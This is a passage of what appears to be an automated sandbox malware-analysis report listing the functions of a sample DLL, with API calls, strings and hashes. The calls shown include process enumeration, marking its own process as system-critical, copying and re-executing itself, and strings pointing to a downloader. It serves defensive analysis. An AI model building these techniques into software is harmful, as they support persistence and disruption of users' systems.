                                                                                                                                                                      • Instruction Fuzzy Hash: 2A5109B5D40219ABEB04DFA4CC85FEEB775FF48741F108209F605BA290D774AA90CB61
                                                                                                                                                                      Function 1000F260 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000F26D
                                                                                                                                                                      • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 1000F298
                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(1000D110), ref: 1000F2C1
                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1000F2CB
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to retrieve first process., xrefs: 1000F2A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
                                                                                                                                                                      • String ID: Failed to retrieve first process.
                                                                                                                                                                      • API String ID: 592929778-1967016982
                                                                                                                                                                      • Opcode ID: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                      • Instruction ID: 0ce586cc59c24ae6f6b9b608917b68c1bdf63cf15262094913b6f28177916ec4
                                                                                                                                                                      • Opcode Fuzzy Hash: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D1196B4900218FFEB10EFB0CD89AAE77B8EF08391F104699E90597155D734EB54EB50
                                                                                                                                                                      Function 1000EE80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                      • RpcBindingFromStringBindingW.RPCRT4(10001D8E,00000000), ref: 1000EED9
                                                                                                                                                                      • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 1000EF10
                                                                                                                                                                      • RpcStringFreeW.RPCRT4(10001D8E), ref: 1000EF1A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                      • String ID: localhost
                                                                                                                                                                      • API String ID: 1126441048-2663516195
                                                                                                                                                                      • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction ID: cda66700fc1d67de1566ef6c2ee8939abb6b7c8c1a3f56331cb5e05d924021ce
                                                                                                                                                                      • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction Fuzzy Hash: B611D7B4D00209BFEB14CFE4C985BEEBBB4FB08704F108159E605BB280D7B59A54CBA0
                                                                                                                                                                      Function 10001A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 87windowthreadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(00000008), ref: 10001A93
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10001A9D
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001AC3
                                                                                                                                                                      • SetWindowTheme.UXTHEME(00020456,10012444,10012440), ref: 10001ADE
                                                                                                                                                                      • SendMessageW.USER32(00020456,00000409,00000000,00D77800), ref: 10001AF7
                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001B08
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001B80,?,00000000,00000000), ref: 10001B49
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 10001B54
                                                                                                                                                                      • DefWindowProcW.USER32(00000002,?,?,?), ref: 10001B6D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                                                                                      • String ID: $msctls_progress32$3Ro
                                                                                                                                                                      • API String ID: 1181878002-754273676
                                                                                                                                                                      • Opcode ID: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
                                                                                                                                                                      • Instruction ID: 2e44a71670f0cdec86f34bb6316c117ddb1687e3aa8b51598d2db09470581217
                                                                                                                                                                      • Opcode Fuzzy Hash: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 9431F6B4A44208FFF710DF94CC89FAA7BB5EB48741F208158FA09AB295D770E950CB65
                                                                                                                                                                      Function 10001830 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 153windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 10001852
                                                                                                                                                                        • Part of subcall function 10001600: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                        • Part of subcall function 10001600: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                        • Part of subcall function 10001600: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 100019AD
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,10011876), ref: 100019E8
                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,10011876), ref: 100019F7
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001A1E
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 10001A2C
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 10001A36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageWindow$CallbackClassCreateDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskTranslateUserwcstombs
                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                      • API String ID: 919245287-3182466430
                                                                                                                                                                      • Opcode ID: d7e5858510ef4e4d2c6ac9c6255a0426f83fb6908b9dccf1c9d93bd52c33f40c
                                                                                                                                                                      • Instruction ID: 02b1e0a1a7493eeed2e2321454f16a2ce6d8cc5e573885ca1cf39a898ac010b9
                                                                                                                                                                      • Opcode Fuzzy Hash: d7e5858510ef4e4d2c6ac9c6255a0426f83fb6908b9dccf1c9d93bd52c33f40c
                                                                                                                                                                      • Instruction Fuzzy Hash: 215107B5D00318AFEB54CFA4CC45BDEBBB5FB48340F108169E119A7295EB746A44CF61
                                                                                                                                                                      Function 10010610 Relevance: 7.5, APIs: 5, Instructions: 28threadsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 1001061D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000), ref: 10010624
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 10010639
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 1001064E
                                                                                                                                                                        • Part of subcall function 10001170: LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                        • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                        • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                        • Part of subcall function 10001170: GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                        • Part of subcall function 10001170: RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                        • Part of subcall function 10001170: CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001065B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindowexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1070008423-0
                                                                                                                                                                      • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                      • Instruction ID: b32196050963cedc899c835c863bf3fa77a81109efd19031f53f5ae39edb479e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                      • Instruction Fuzzy Hash: 71E026B53C4354BBF265A7E05C8BF4936549B09F42F608650F309BD0E2CAF4B450C62D
                                                                                                                                                                      Function 1000F330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 1000EE80: RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                      • _swprintf.LIBCMTD ref: 1000F3DC
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1000F433
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1000F484
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep$BindingComposeString_swprintf
                                                                                                                                                                      • String ID: 5555555555
                                                                                                                                                                      • API String ID: 4095827290-304217070
                                                                                                                                                                      • Opcode ID: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                      • Instruction ID: fc69ec1e48ae5d690075e784bcaa941b9f802e524bc258fcaffae97851e079c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B516DB5D00208ABEB14DFD4DC41BEFB7B8EB48340F108118FA05BB686D734AA44DBA1
                                                                                                                                                                      Function 10010450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 10010380: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100103B3
                                                                                                                                                                        • Part of subcall function 10010330: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001034E
                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,?,00000000), ref: 100105A6
                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 100105CC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ModuleName$CopyExecuteShell
                                                                                                                                                                      • String ID: %s\%s$open
                                                                                                                                                                      • API String ID: 689381381-538903891
                                                                                                                                                                      • Opcode ID: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                      • Instruction ID: 9fe97893565a199cb231c8e39f665fc81eb16fc602bb536f2ce1346a8447d072
                                                                                                                                                                      • Opcode Fuzzy Hash: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                      • Instruction Fuzzy Hash: ED5190B4D04248ABEB14CFA0C891BEEBBB5EF05344F508198F5557B282DB75AB88CB51
                                                                                                                                                                      Function 1000F080 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 328 1000f080-1000f0a2 329 1000f0a9-1000f0b0 328->329 330 1000f0b6-1000f0d2 call 1000ff70 329->330 331 1000f1fb 329->331 334 1000f0d7-1000f0e1 330->334 332 1000f1fd-1000f200 331->332 335 1000f0e3 334->335 336 1000f0e8-1000f0ef 334->336 335->331 337 1000f0fa-1000f100 336->337 338 1000f1b4-1000f1bb 337->338 339 1000f106-1000f115 337->339 340 1000f1c6-1000f1cc 338->340 341 1000f118-1000f128 339->341 342 1000f1e1-1000f1f2 CoTaskMemFree 340->342 343 1000f1ce-1000f1df CoTaskMemFree 340->343 344 1000f12a-1000f12f 341->344 345 1000f15d-1000f162 341->345 347 1000f1f4 342->347 348 1000f1f6 342->348 343->340 349 1000f131-1000f143 344->349 350 1000f154-1000f15b 344->350 351 1000f165-1000f16f 345->351 347->331 348->329 349->345 352 1000f145-1000f152 349->352 350->351 353 1000f171-1000f178 351->353 354 1000f1af 351->354 352->341 352->350 356 1000f183-1000f189 353->356 354->337 357 1000f18b-1000f19c CoTaskMemFree 356->357 358 1000f19e-1000f1ad CoTaskMemFree 356->358 357->356 358->332
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 1000FF70: NdrClientCall2.RPCRT4 ref: 1000FF8F
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000F195
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000F1A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeTask$Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3085621743-0
                                                                                                                                                                      • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                      • Instruction ID: 92fa5dec9f22b8c7c1328a1cbf0c23ece76f2aec65bf6276d958f50508a6dbd7
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                      • Instruction Fuzzy Hash: EB51F5B4E04209EBEF04CF94C894AEEB7B1FF48344F20815DE815A7748D735AA85EB91
                                                                                                                                                                      Function 10001600 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                      • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2577077003-0
                                                                                                                                                                      • Opcode ID: d300af7b25cb6414e2c33b3673a1f19339b002bae4b2470d2ba77c7d2a319cd1
                                                                                                                                                                      • Instruction ID: 5f7cab8de45bcdf2407ecebcb5d22f8ee1252467d95dee99cd854b3eb2a3a61a
                                                                                                                                                                      • Opcode Fuzzy Hash: d300af7b25cb6414e2c33b3673a1f19339b002bae4b2470d2ba77c7d2a319cd1
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B2117B1900219EBEB04DF94CC95BEEBBB4FF08700F108518F615AB295DB75AA44CBD0
                                                                                                                                                                      Function 1000FF40 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 374 1000ff40-1000ff6e NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                      • Opcode ID: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
                                                                                                                                                                      • Instruction ID: 7492027a281e140068cdac0bb76a9e8e76146da9bd0683f37df95b5dae096a5d
                                                                                                                                                                      • Opcode Fuzzy Hash: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED05EF190100CBBDB05CF88CC42AA977ACE784205F00C069EA0AC6200E931AA904691
                                                                                                                                                                      Function 1000FF70 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 375 1000ff70-1000ffa1 NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                      • Opcode ID: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
                                                                                                                                                                      • Instruction ID: 6afe2523060cff6880f9b4da93d12d89cb254fb88d74a93b831ee34bf0bcd51a
                                                                                                                                                                      • Opcode Fuzzy Hash: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
                                                                                                                                                                      • Instruction Fuzzy Hash: 69D05EB190000CBBE705CF88CC12AE977ACE785305F00C069EA0A8A240E931AA544691
                                                                                                                                                                      Function 1000FFB0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 376 1000ffb0-1000ffe1 NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                      • Opcode ID: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
                                                                                                                                                                      • Instruction ID: 01a6fe9224db3f7d7e4205a28be5e1d10279d7ad68670d0b988955ce86484041
                                                                                                                                                                      • Opcode Fuzzy Hash: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
                                                                                                                                                                      • Instruction Fuzzy Hash: F2D05EB190100CBBE705CF88CC02AA977ADE784305F00C169FA0A86240E931AE504691
                                                                                                                                                                      Function 1000FFF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 377 1000fff0-10010021 NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
